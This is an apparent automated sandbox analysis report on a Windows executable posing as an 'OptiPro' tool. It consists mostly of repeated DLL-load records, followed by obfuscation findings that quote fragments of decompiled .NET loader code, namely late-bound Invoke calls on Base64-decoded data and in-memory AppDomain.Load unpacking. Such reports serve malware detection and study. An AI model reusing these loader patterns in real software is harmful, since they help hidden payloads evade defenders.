                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Opti.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeDirectory created: C:\Program Files\Common Files\OptiProV2.exeJump to behavior
                  Source: r4RF3TX5Mi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: r4RF3TX5Mi.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: r4RF3TX5Mi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: r4RF3TX5Mi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\hesa\Downloads\Stuff\OptiPro\KreYzeSpoofer\obj\x64\Release\OptiPro.pdb source: r4RF3TX5Mi.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.Kdv2EiOtLKwJ44tawvUojMKHHus8rBaUraFLoHullHpC5KyNnF389VFEbt,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.ErDTIcY27lmsDbpSO2vb1w7WCE7JeCu7pEBhcdv1DBbZCerXPzSIyEuYRL,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.gTtncCk6JYG3H25wG6lZws21vKK12FI8DM4BtXzZEJNjBccvGvfxjzpMKy,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.JXIh3hDdaXJi6YURowbZqfBoBvdsNGeJTxAlmz1W38LH7vh3xvOtbXDnYq,_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.NRPD6lrMVBMbkpkdk8nin9EdAFqOZFBo9()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2],_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.VuOHR0hq1DNXZtKhZIr74TA4GlEjWkRGv(Convert.FromBase64String(rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.Kdv2EiOtLKwJ44tawvUojMKHHus8rBaUraFLoHullHpC5KyNnF389VFEbt,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.ErDTIcY27lmsDbpSO2vb1w7WCE7JeCu7pEBhcdv1DBbZCerXPzSIyEuYRL,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.gTtncCk6JYG3H25wG6lZws21vKK12FI8DM4BtXzZEJNjBccvGvfxjzpMKy,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.JXIh3hDdaXJi6YURowbZqfBoBvdsNGeJTxAlmz1W38LH7vh3xvOtbXDnYq,_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.NRPD6lrMVBMbkpkdk8nin9EdAFqOZFBo9()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2],_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.VuOHR0hq1DNXZtKhZIr74TA4GlEjWkRGv(Convert.FromBase64String(rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.Kdv2EiOtLKwJ44tawvUojMKHHus8rBaUraFLoHullHpC5KyNnF389VFEbt,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.ErDTIcY27lmsDbpSO2vb1w7WCE7JeCu7pEBhcdv1DBbZCerXPzSIyEuYRL,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.gTtncCk6JYG3H25wG6lZws21vKK12FI8DM4BtXzZEJNjBccvGvfxjzpMKy,daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.JXIh3hDdaXJi6YURowbZqfBoBvdsNGeJTxAlmz1W38LH7vh3xvOtbXDnYq,_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.NRPD6lrMVBMbkpkdk8nin9EdAFqOZFBo9()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2],_4v1Fg9lvwdMQcNkCpgcirqY4wESjnMUNt.VuOHR0hq1DNXZtKhZIr74TA4GlEjWkRGv(Convert.FromBase64String(rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { rbDAsvaGbAIJ28Jj84qylyPrPj1ISKkpTOg9PyMWhCPIFJyrIATYfF6e6RJrTk3TImxkOBMCWCnM1T4mNohDqWiQKM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0 System.AppDomain.Load(byte[])
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo System.AppDomain.Load(byte[])
                  Source: OptiProV2.exe.1.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0 System.AppDomain.Load(byte[])
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo System.AppDomain.Load(byte[])
                  Source: Opti.exe.11.dr, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: tdaBnLFL8CLUgNYzg3nZ8VJMUNlHf7Okz6AwLYNXfzU2Orlquk2MsKnjS0 System.AppDomain.Load(byte[])
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo System.AppDomain.Load(byte[])
                  Source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, ibPsRQtcNZDVmeWnPONHOew7czpAQwrKHTG2mVNLfYJOGsE8jINAGLbZIU.cs.Net Code: KFXaA09p3Hw0XHSRMnb2PH0IQ9BuWHZBTyftITSLZbo6TLvoJ4xHTfFbPPTsgKbKfjfxoK727ZGqhvN8pg54hS3Bzo
                  Source: C:\Program Files\Common Files\OptiProV2.exeCode function: 11_2_00007FFAACCD33C8 push ebx; retf FFEEh11_2_00007FFAACCD33FA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACB9D2A5 pushad ; iretd 12_2_00007FFAACB9D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACD82316 push 8B485F94h; iretd 12_2_00007FFAACD8231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACB9D2A5 pushad ; iretd 16_2_00007FFAACB9D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACCB0E8A push E95DB3D6h; ret 16_2_00007FFAACCB0E89
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACCB0EAD push E95DB3D6h; ret 16_2_00007FFAACCB0E89
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACCB0DEA push E95DB3D6h; ret 16_2_00007FFAACCB0E89
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAACD82316 push 8B485F94h; iretd 16_2_00007FFAACD8231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACBBD2A5 pushad ; iretd 19_2_00007FFAACBBD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACCDBCA3 push E859F9D5h; ret 19_2_00007FFAACCDBCF9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFAACDA2316 push 8B485F92h; iretd 19_2_00007FFAACDA231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACB9D2A5 pushad ; iretd 23_2_00007FFAACB9D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAACD82316 push 8B485F94h; iretd 23_2_00007FFAACD8231B
                  Source: OptiProV2.exe.1.dr, daWPK2MotSIVNXEb1fjphr2RTyeHG5kJYS4enCXdIVgC6TuIuqi1BiS2fD.csHigh entropy of concatenated method names: 'Du6Wvo3MA37CmW3QujhgdkPl41wosLCAV', 'Gv3PV9RYykbFv1PgWpMZi4XKqiP34EYDI', 'o5ZivuOBJhWvmh92OCHyMdvIKy6eVdvQE', 'NFMywueN1MlSNkf39ZfbPLffHUEIA6Gvm'
                  Source: OptiProV2.exe.1.dr, oYzkRWMQkXeLlHUoXwTOCVgY0rWUj0Ra9.csHigh entropy of concatenated method names: 'rT1Ege8TUbkYaA8swZHIO7Ql8Z6q9emjZ', 'fJospcbl5Hk02iHSpRdUYaInl9Siv3imb', 'MGoPFtkpOv29CytOT4nFqYhWWzhQ6kgq7', 'GWn0jFEN3KxL6MHxkX', 'B8gGArmVKYLKe3U0Ea', '_6e25XUiCZVzXjryT0K', 'sbybPI9gMoGG52CcKE', 'WLioSC7bd03SqgPYJJ', 'sG9J3pnq6zVJ7bi10f', 'BaAXFefGrSTVxtFmvZ'
                  Source: OptiProV2.exe.1.dr, XmZT00CU7TnrVdVKYNQp4CxjUG7n74Z3fORqw1RK9ysxlkR7eLu2JBdKUY.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'S6GEORgNBZkzRHjzOfwmfIstv5oze6bh0', '_49unOERGpuidMWLPd5Wn3mJcRkObpci9g', '_0mqRMMIOjnrmOocUadbpjOD1Mqwuz3fTe', 'JjcpU6yPRHnHDfcgSYTIuOKeVGE924tHp'
